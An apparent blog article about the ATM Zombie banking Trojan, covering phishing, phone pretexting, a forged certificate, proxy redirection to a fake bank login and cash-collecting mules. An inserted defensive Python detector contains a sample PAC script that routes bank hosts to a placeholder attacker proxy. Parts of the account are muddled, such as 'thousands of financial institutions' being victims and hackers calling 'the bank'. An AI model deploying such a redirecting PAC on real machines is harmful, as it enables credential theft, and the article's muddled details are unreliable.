ATM Zombie – A Malware Stealing Money From Israeli Bank Accounts


Hundreds, possibly thousands, of financial institutions in Israel fell prey to an attack that allowed online criminals to pilfer several thousand shekels from many bank accounts. Thanks to the strict and well-structured online safety checks in the Israeli banking industry, the fraud was found early on, allowing security staff to put procedures in place to stop the attacks.

Image Source: The Jerusalem Post - A bank employee counts Israeli Shekel notes for the camera at a bank branch in Tel Aviv.

The hackers used a technique called proxy changing. Rather than shifting money digitally, the online criminals mobilised an infantry of street thugs willing to withdraw hard cash from automated teller machines, using a mobile phone application that lets account holders authorise the use of ATM or plastic cards and send cash-withdrawal requests to cash machines from their devices. The street thugs, or collectors, who did all the dirty work would then deliver almost all of the cash to drop-box services in Israel, from where it was sent on to other countries, obviously after keeping a bit for themselves.

This attack is social engineering at its best. First, the cyber criminals had to convince the targets to open the link that deployed the Trojan, which gave them access to customer data and the capability to execute the attack. That was only the first part: after handling the banking side carefully, the hackers had to persuade their hired workforce to take part in an unlawful scheme, thieving shekels from cash machines and then forwarding that money to a third party the thugs had never seen or knew anything about.

From a hacker’s point of view Bitcoin is ‘the money,’ but who doesn’t like cash?

There is a set limit on what you can pull out of an ATM at a time. So why transfer the money from one account to another when you can make the ATM spit out the cash?

Image Source: Secure List – A chart showing how the ATM Zombie banking Trojan works, created by the experts at Kaspersky.

Once the money collectors have the required amount, they pack up the cash, go to a nearby mail centre and ship it overnight to an address given to them. The investigators said that they do not yet have all the details of how and where the money was sent, but they are confident the criminals had many tricks up their sleeves when it came to dropping off the money. For instance, the money collectors could go to any small money exchange, convert the shekels into dollars and ship the package overnight.

The investigators stated that this theft involved many layers. To begin the attacks, the online criminals delivered the malware using a technique called spear phishing. Spear phishing is an attack conducted by sending an email that appears to come from a known business or someone on your contact list. The email contains one or more links. Once a link is clicked, it installs a keylogger, spyware, a back door or whatever else the hacker wants the link to conceal. Once the intended malware is installed, all of the victim’s information can easily be captured.

Image Source: Secure List – A screenshot of the malware’s pseudocode.

After the email is sent, the hackers call the bank and pose as personnel from the bank’s security department who are testing online security features; they guide the person and convince them to click the link that eventually installs the malware. The golden ticket in this attack is that the hackers install a forged digital certificate, which allows encrypted communication with the servers connected to the financial institutions. The hackers’ program then redirects the data to the hackers’ server by changing the machine’s proxy settings, making it look as if the data was being delivered to the legitimate servers, which in turn keeps the bank’s security systems quiet.

So when the bank’s staff go to the bank’s official login page, they are redirected to a fake website, made possible by the malware hiding itself on the computer, that is an exact copy of the bank’s secure login page, and the staff member ends up entering login credentials that are stored on the servers set up by the hackers. After obtaining all the information required to manipulate the bank’s online system, the hackers can then work on the bank’s ATMs and tell their hired money collectors to go to a certain ATM at a certain time and collect the money from it, which is then mailed to the hackers’ foreign address.
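The selective proxy redirection described above is the kind of thing a defender can check for on an endpoint. The following is an added example, not code from the article or from Kaspersky: it assumes (an assumption, not stated on the page) that the proxy changer works through a proxy auto-config (PAC) script, and it flags PAC rules that divert specific bank hostnames to a proxy while every other host goes DIRECT. The hostnames and proxy address are constructed placeholders.

```python
import re
from fnmatch import fnmatch

# Constructed sample PAC script modelled on the proxy-changing trick: only the
# bank's hosts are sent through the attacker's proxy, everything else goes
# DIRECT so the victim notices nothing. Hostnames and the proxy IP are invented.
SAMPLE_PAC = r'''
function FindProxyForURL(url, host) {
    if (shExpMatch(host, "*.examplebank.test")) return "PROXY 198.51.100.23:8080";
    if (shExpMatch(host, "login.examplebank.test")) return "PROXY 198.51.100.23:8080";
    return "DIRECT";
}
'''

# Constructed benign PAC: a normal corporate setup sends ALL traffic via one proxy.
CLEAN_PAC = 'function FindProxyForURL(url, host) { return "PROXY corpproxy.example:3128"; }'

# Matches: shExpMatch(host, "<glob>") ... return "PROXY <addr>";  (one rule per statement)
RULE_RE = re.compile(
    r'shExpMatch\s*\(\s*host\s*,\s*"([^"]+)"\s*\)[^;]*?return\s*"(PROXY\s+[^"]+)"',
    re.IGNORECASE | re.DOTALL,
)


def extract_proxy_rules(pac_text):
    """Return (host_glob, proxy_directive) pairs for every host-specific rule
    that routes traffic to a proxy. shExpMatch uses shell-style globs, which
    fnmatch reproduces closely enough for hostname patterns."""
    return RULE_RE.findall(pac_text)


def default_action(pac_text):
    """The last return statement is the fallback for hosts no rule matched."""
    returns = re.findall(r'return\s*"([^"]+)"', pac_text)
    return returns[-1] if returns else None


def flag_selective_proxying(pac_text, watched_hosts):
    """Flag rules that divert a watched (e.g. bank) hostname to a proxy while
    the fallback is DIRECT: the selective-redirect pattern used by ATM Zombie.
    Returns a list of (watched_host, matching_glob, proxy_directive)."""
    if default_action(pac_text) != "DIRECT":
        return []  # everything is proxied uniformly; not the selective pattern
    hits = []
    for glob, proxy in extract_proxy_rules(pac_text):
        for host in watched_hosts:
            if fnmatch(host.lower(), glob.lower()):
                hits.append((host, glob, proxy))
    return hits


if __name__ == "__main__":
    for hit in flag_selective_proxying(SAMPLE_PAC, ["login.examplebank.test"]):
        print("suspicious PAC rule:", hit)
```

In practice the watched-host list would be the bank's real login hostnames, and the PAC text would be read from the location the endpoint's proxy settings point to.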

Thanks to the security specialists working for the Israeli financial institutions, the intrusion was detected in its early stages and stopped, saving millions from being stolen.

Source: The Jerusalem Post, Secure List
